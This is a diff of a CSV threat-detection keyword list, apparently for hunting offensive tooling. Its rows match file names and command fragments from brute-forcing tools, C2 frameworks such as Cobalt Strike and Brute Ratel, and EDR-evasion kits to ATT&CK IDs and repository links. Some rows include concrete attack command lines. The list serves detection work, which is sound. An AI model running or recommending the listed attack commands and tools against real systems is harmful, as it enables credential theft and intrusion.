"*brute_force_ntlm.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*bruteforce *.txt*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteforce *.txt*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*Brute-force Unsuccessful!*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*bruteforce.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteforce.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*BruteForce.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*BruteforceCLSIDs.*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*bruteForceCombos*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceCombos*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*Brute-force-Instagram-*.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "*bruteforce-luks -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*bruteloader*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*brute-locadmin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*brute-locadmin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*brute-ratel-*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.tar.gz*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel.com/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brute-Ratel-C4*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Brutesploit.git*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" -"*BruteSploit/wlist/*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" -"*brutespray*","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","1771","378","2023-03-15T23:00:29Z","2017-04-05T17:05:10Z" -"*BruteStager.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*BruteStager.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*bruteuser.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*bruteuserCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*BruteX*","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","1713","562","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" +"*Brutesploit.git*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*BruteSploit/wlist/*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*brutespray*","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","1772","378","2023-03-15T23:00:29Z","2017-04-05T17:05:10Z" +"*BruteStager.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*BruteStager.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*bruteuser.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteuserCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*BruteX*","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","1714","562","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" "*bshinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bshinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bshspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" @@ -8023,13 +8170,13 @@ "*bucketloot-openbsd64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" "*bucketloot-windows32.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" "*bucketloot-windows64.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" -"*buffer_overflow.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*buffer_overflow.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*-Build $RandomAttackPath*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*build Freeze.go*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*build Freeze.go*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*build SourcePoint.go*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*build Supernova.go*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*build.ps1 -commands * -profile *selfcontained -singlefile*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*build.ps1 -profiles * -commands * -compressed*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*build Supernova.go*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*build.ps1 -commands * -profile *selfcontained -singlefile*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*build.ps1 -profiles * -commands * -compressed*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*build/breg.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 